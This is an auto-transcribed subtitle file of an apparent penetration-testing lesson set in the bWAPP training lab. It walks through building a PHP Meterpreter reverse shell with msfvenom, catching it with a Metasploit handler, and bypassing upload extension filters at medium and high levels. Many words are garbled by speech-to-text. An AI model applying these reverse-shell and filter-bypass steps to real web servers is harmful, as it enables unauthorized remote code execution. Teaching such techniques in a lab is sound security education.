1
00:00:00,480 --> 00:00:07,680
‫Now, another problem that you will probably see while you're testing unrestricted file upload forms.

2
00:00:08,870 --> 00:00:12,800
‫And sometimes you can bypass restrictions if they're not properly coated.

3
00:00:13,780 --> 00:00:20,350
‫So in this lesson, we are going to be dealing with an unrestricted file upload challenge.

4
00:00:20,980 --> 00:00:28,420
‫You'll see why in a minute, so go to Kelly and log in to B Web and open unrestricted file upload page

5
00:00:28,420 --> 00:00:29,230
‫from the menu.

6
00:00:32,110 --> 00:00:36,100
‫Now, to see how it works, browse and then choose a picture on your computer.

7
00:00:38,010 --> 00:00:39,330
‫And then upload the file.

8
00:00:40,580 --> 00:00:42,230
‫And you will see a link below.

9
00:00:43,130 --> 00:00:44,990
‫So click it to visit the image.

10
00:00:45,770 --> 00:00:47,270
‫Yeah, I uploaded said.

11
00:00:48,890 --> 00:00:54,380
‫So, OK, enable foxy proxy, and I'm going to arrange the view for you here.

12
00:00:54,410 --> 00:00:55,070
‫So.

13
00:00:56,690 --> 00:00:57,590
‫We can look at the coat.

14
00:01:02,980 --> 00:01:04,870
‫Now, there's no check for a low level.

15
00:01:06,060 --> 00:01:09,930
‫But for medium file upload check one is called.

16
00:01:11,180 --> 00:01:13,730
‫And for high level Check two is called.

17
00:01:15,260 --> 00:01:15,640
‫OK.

18
00:01:15,680 --> 00:01:21,320
‫Exit now I created a folder for this example before, so I'm going to go to that folder.

19
00:01:22,350 --> 00:01:25,890
‫And I'm going to prepare a shell with MSF Venom tool.

20
00:01:27,050 --> 00:01:34,850
‫So type massive venom does p p slash interpreters slash reverse TCP for the payload?

21
00:01:38,130 --> 00:01:43,310
‫And our host equals one nine two one six eight two zero four two one two eight four.

22
00:01:43,320 --> 00:01:52,140
‫The local host dress and airport equals four four four three four, the local port in Cali and the file

23
00:01:52,140 --> 00:01:52,470
‫name.

24
00:01:54,220 --> 00:01:58,330
‫And now we can provide some other parameters to measure venom.

25
00:02:00,200 --> 00:02:03,320
‫But we don't need this for this example.

26
00:02:04,340 --> 00:02:05,120
‫So.

27
00:02:07,720 --> 00:02:09,340
‫OK, the payload is created.

28
00:02:10,730 --> 00:02:14,840
‫So here it is, my folder and this is the content.

29
00:02:16,320 --> 00:02:17,460
‫All right, so we're done here.

30
00:02:17,940 --> 00:02:19,980
‫So then go back to Firefox.

31
00:02:21,140 --> 00:02:26,780
‫Well, browse for images, but choose shelled out IP and upload it.

32
00:02:28,440 --> 00:02:30,660
‫Yeah, followed request is in burp on the right.

33
00:02:31,920 --> 00:02:34,080
‫And you can see the content of the file.

34
00:02:35,940 --> 00:02:40,200
‫And the content type is application XP, HP.

35
00:02:40,980 --> 00:02:41,970
‫OK, so let it go.

36
00:02:44,060 --> 00:02:46,310
‫And the link appears on the page.

37
00:02:47,670 --> 00:02:49,980
‫But now, before clicking, let's go back to terminal.

38
00:02:51,880 --> 00:02:55,930
‫Now, I forgot to create a handler to capture the reverse connection.

39
00:02:56,800 --> 00:02:58,030
‫So open Metasploit.

40
00:03:01,270 --> 00:03:05,470
‫OK, so use exploit slash multi slash handler.

41
00:03:07,120 --> 00:03:11,440
‫And then set payload to reverse TCP.

42
00:03:15,610 --> 00:03:18,450
‫And you can set local host to IP address of Kelly.

43
00:03:22,380 --> 00:03:24,720
‫And said the local board two, four, four, four three.

44
00:03:26,650 --> 00:03:28,900
‫So one more time we'll show the options.

45
00:03:30,630 --> 00:03:34,920
‫And then type exploit this, Jay, to run a background job.

46
00:03:35,880 --> 00:03:39,690
‫OK, so go to Firefox and click here to see the Shell.

47
00:03:41,580 --> 00:03:44,250
‫And the session is open in terminal.

48
00:03:45,800 --> 00:03:48,470
‫So type sessions to list sessions.

49
00:03:49,800 --> 00:03:52,110
‫And interact with the session one.

50
00:03:53,590 --> 00:03:53,940
‫Type.

51
00:03:54,580 --> 00:03:57,520
‫Get you I.D. for the user of the open shell.

52
00:03:58,660 --> 00:04:05,380
‫And then this info, you see the basic info about the open the shell, exit the shell.

53
00:04:06,570 --> 00:04:10,260
‫And go back to Firefox, so now I will increase the level.

54
00:04:11,430 --> 00:04:12,420
‫So choose Medium.

55
00:04:13,710 --> 00:04:15,540
‫And try to upload the shell again.

56
00:04:19,700 --> 00:04:23,600
‫And there's the year because these extensions are not allowed.

57
00:04:25,360 --> 00:04:27,400
‫OK, so let's enable interception.

58
00:04:28,880 --> 00:04:30,800
‫And then upload the show file again.

59
00:04:33,570 --> 00:04:35,150
‫EverQuest request is here in Burp.

60
00:04:37,130 --> 00:04:42,650
‫OK, so change the extension in the file name and just add three to the end.

61
00:04:43,520 --> 00:04:44,000
‫That's all.

62
00:04:45,110 --> 00:04:46,310
‫And send the request.

63
00:04:47,820 --> 00:04:51,540
‫And a link for viewing the uploaded image is right here on the page.

64
00:04:51,990 --> 00:04:55,680
‫But before we do that, let's, uh, let's grab a listener.

65
00:04:56,610 --> 00:05:01,380
‫So start the handler in Metasploit by typing exploit, J.

66
00:05:04,600 --> 00:05:05,710
‫Now, click the link.

67
00:05:07,790 --> 00:05:09,410
‫Perfect sessions open.

68
00:05:11,050 --> 00:05:12,940
‫So interact with session to.

69
00:05:14,730 --> 00:05:19,920
‫And we'll run get you I.D., The user is WW W data.

70
00:05:21,050 --> 00:05:24,920
‫And this info for the basic information about the shell.

71
00:05:26,270 --> 00:05:27,140
‫And then you can exit.

72
00:05:28,720 --> 00:05:30,400
‫Now, go back to Firefox again.

73
00:05:31,550 --> 00:05:33,950
‫And I'm going to increase the level one more.

74
00:05:35,070 --> 00:05:39,840
‫So select high and now try to upload the shell file again.

75
00:05:42,480 --> 00:05:43,860
‫And there's our friend, the error.

76
00:05:45,440 --> 00:05:55,340
‫But this time it allows only these extensions, OK, so enable interception and upload the file.

77
00:05:57,780 --> 00:06:02,150
‫And this time the problem can be solved by adding a suitable extension to the file name.

78
00:06:04,770 --> 00:06:06,180
‫And let it go.

79
00:06:08,420 --> 00:06:11,810
‫And there's the upload problem solved.

80
00:06:12,590 --> 00:06:13,220
‫Here's the link.

81
00:06:14,820 --> 00:06:16,980
‫So both the terminal and start the handler.

82
00:06:18,270 --> 00:06:18,750
‫OK.

83
00:06:18,780 --> 00:06:19,740
‫It is done.

84
00:06:21,960 --> 00:06:22,800
‫Now, click the link.

85
00:06:24,870 --> 00:06:26,000
‫Hey, nothing happened.

86
00:06:27,260 --> 00:06:28,100
‫There's no session.

87
00:06:29,310 --> 00:06:30,000
‫It doesn't work.

88
00:06:31,040 --> 00:06:40,000
‫Because the application tries to open an image file, but remember to keep file so it gets confused.

89
00:06:40,070 --> 00:06:42,230
‫Throws an error without executing it.

90
00:06:43,630 --> 00:06:46,960
‫So we cannot directly execute this show.

91
00:06:47,880 --> 00:06:50,570
‫But remember, we discovered eye on beware.

92
00:06:51,270 --> 00:06:56,340
‫So we can use MNF-I to include our shell into the application.

93
00:06:57,350 --> 00:06:58,880
‫But that's for you to do.

94
00:06:59,330 --> 00:07:02,600
‫I know, you know how, because we did MNF-I several times.

95
00:07:03,380 --> 00:07:04,160
‫Have fun with that.